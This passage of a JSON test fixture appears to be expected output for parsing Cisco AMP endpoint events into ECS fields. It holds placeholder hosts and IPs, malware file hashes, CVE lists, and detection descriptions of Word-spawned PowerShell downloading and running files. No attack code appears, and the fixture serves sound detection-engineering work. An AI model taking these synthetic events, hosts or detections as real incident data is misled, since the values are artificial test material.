Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6411132837046518000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.0B965CA8AF-95.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + 
"file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6411132837046517762", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "file": { + "name": "MspthrdHash.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "hash": { + "sha1": "5faebef3bb880489195e80e6656ccf442ff7123b", + "sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "md5": "84b6f7be5370c1998886214790c6892b" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "84b6f7be5370c1998886214790c6892b", + "5faebef3bb880489195e80e6656ccf442ff7123b" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:35.701391536Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":682000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\",\"sha1\":\"5faebef3bb880489195e80e6656ccf442ff7123b\",\"md5\":\"84b6f7be5370c1998886214790c6892b\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6411132837046518000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.0B965CA8AF-95.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6411132837046517761", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef" + } + }, + "@timestamp": "2021-01-13T10:37:33.000Z", + "file": { + "name": "WINWORD.EXE", + 
"hash": { + "sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP" + ], + "hash": [ + "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP", + "hostname": "Demo_AMP" + }, + "event": { + "severity": 1, + "ingested": "2021-09-12T17:32:35.701393451Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15152998206589,\"timestamp\":1610534253,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-13T10:37:33+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610534253,\"start_date\":\"2021-01-13T10:37:33+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WINWORD.EXE\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft 
Office\",\"version\":\"2013\",\"cve\":\"CVE-2014-0260\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260\"},{\"cve\":\"CVE-2014-1761\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761\"},{\"cve\":\"CVE-2014-6357\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357\"},{\"cve\":\"CVE-2015-0085\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085\"},{\"cve\":\"CVE-2015-0086\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086\"},{\"cve\":\"CVE-2015-1641\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641\"},{\"cve\":\"CVE-2015-1650\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650\"},{\"cve\":\"CVE-2015-1682\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682\"},{\"cve\":\"CVE-2015-2379\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379\"},{\"cve\":\"CVE-2015-2380\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380\"},{\"cve\":\"CVE-2015-2424\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424\"},{\"cve\":\"CVE-2016-0127\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127\"},{\"cve\":\"CVE-2016-7193\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193\"},{\"cve\":\"CVE-2017-0292\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292\"},{\"cve\":\"CVE-2017-11826\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826\"}]}}", + "kind": "alert", + "start": "2021-01-13T10:37:33.000Z", + "action": "Vulnerable Application Detected", + "id": "15152998206589", + "category": [ + 
"file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "38:1e:eb:ba:2c:15", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "38:1e:eb:ba:2c:15" + ], + "cve": [ + "CVE-2014-0260", + "CVE-2014-1761", + "CVE-2014-6357", + "CVE-2015-0085", + "CVE-2015-0086", + "CVE-2015-1641", + "CVE-2015-1650", + "CVE-2015-1682", + "CVE-2015-2379", + "CVE-2015-2380", + "CVE-2015-2424", + "CVE-2016-0127", + "CVE-2016-7193", + "CVE-2017-0292", + "CVE-2017-11826" + ] + }, + "vulnerabilities": [ + { + "name": "Microsoft Office", + "score": "9.3", + "cve": "CVE-2014-0260", + "version": "2013", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260" + }, + { + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761", + "cve": "CVE-2014-1761" + }, + { + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357", + "cve": "CVE-2014-6357" + }, + { + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085", + "cve": "CVE-2015-0085" + }, + { + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086", + "cve": "CVE-2015-0086" + }, + { + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641", + "cve": "CVE-2015-1641" + }, + { + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650", + "cve": "CVE-2015-1650" + }, + { + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682", + "cve": "CVE-2015-1682" + }, + { + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379", + "cve": "CVE-2015-2379" + }, + { + "score": 
"9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380", + "cve": "CVE-2015-2380" + }, + { + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424", + "cve": "CVE-2015-2424" + }, + { + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127", + "cve": "CVE-2016-0127" + }, + { + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193", + "cve": "CVE-2016-7193" + }, + { + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292", + "cve": "CVE-2017-0292" + }, + { + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826", + "cve": "CVE-2017-11826" + } + ], + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 1107296279 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-13T10:23:35.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP", + "hostname": "Demo_AMP" + }, + "event": { + "severity": 0, + "action": "Policy Update", + "ingested": "2021-09-12T17:32:35.701395327Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508159571352093000,\"timestamp\":1610533415,\"timestamp_nanoseconds\":349000000,\"date\":\"2021-01-13T10:23:35+00:00\",\"event_type\":\"Policy 
Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "id": "6508159571352093000", + "kind": "alert" + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "38:1e:eb:ba:2c:15", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "38:1e:eb:ba:2c:15" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648130 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2" + } + }, + "@timestamp": "2021-01-13T10:13:13.000Z", + "file": { + "name": "PowerShell.exe", + "path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe", + "hash": { + "sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP" + ], + "hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP", + "hostname": "Demo_AMP" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:35.701397204Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298360312529000,\"timestamp\":1610532793,\"timestamp_nanoseconds\":312509000,\"date\":\"2021-01-13T10:13:13+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610532793,\"start_date\":\"2021-01-13T10:13:13+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", + "kind": "alert", + "start": "2021-01-13T10:13:13.000Z", + "action": "Cloud IOC", + "id": "1515298360312529000", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "38:1e:eb:ba:2c:15", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "38:1e:eb:ba:2c:15" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "cloud_ioc": { + "short_description": "W32.PowershellDownloadedExecutable.ioc", + "description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command." 
+ }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2" + } + }, + "@timestamp": "2021-01-13T10:13:08.000Z", + "file": { + "name": "PowerShell.exe", + "path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe", + "hash": { + "sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP" + ], + "hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP", + "hostname": "Demo_AMP" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701399064Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298355162029000,\"timestamp\":1610532788,\"timestamp_nanoseconds\":162019000,\"date\":\"2021-01-13T10:13:08+00:00\",\"event_type\":\"Cloud 
IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610532788,\"start_date\":\"2021-01-13T10:13:08+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", + "kind": "alert", + "start": "2021-01-13T10:13:08.000Z", + "action": "Cloud IOC", + "id": "1515298355162029000", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "38:1e:eb:ba:2c:15", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "38:1e:eb:ba:2c:15" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "cloud_ioc": { 
+ "short_description": "W32.WinWord.Powershell", + "description": "Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables." + }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-13T10:00:07.000Z", + "file": { + "hash": { + "sha256": "4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP" + ], + "hash": [ + "4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP", + "hostname": "Demo_AMP" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701401029Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508153524038140000,\"timestamp\":1610532007,\"timestamp_nanoseconds\":606000000,\"date\":\"2021-01-13T10:00:07+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6508153524038139905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6508153524038140000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "38:1e:eb:ba:2c:15", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "38:1e:eb:ba:2c:15" + ] + }, + "detection_id": "6508153524038139905", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + } + }, + "@timestamp": "2021-01-12T10:24:47.000Z", + "file": { + "name": "powershell.exe", + "path": "/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe", + "hash": { + "sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "hash": [ + 
"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Exploit_Prevention_Audit", + "hostname": "Demo_AMP_Exploit_Prevention_Audit" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:35.701402957Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521062325693667300,\"timestamp\":1610447087,\"timestamp_nanoseconds\":693632000,\"date\":\"2021-01-12T10:24:47+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610447087,\"start_date\":\"2021-01-12T10:24:47+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", + "kind": "alert", + "start": "2021-01-12T10:24:47.000Z", + "action": "Cloud IOC", + "id": "1521062325693667300", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "d2:78:15:4a:f4:a2", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "d2:78:15:4a:f4:a2" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "cloud_ioc": { + "short_description": "W32.PowershellDownloadedExecutable.ioc", + "description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command." 
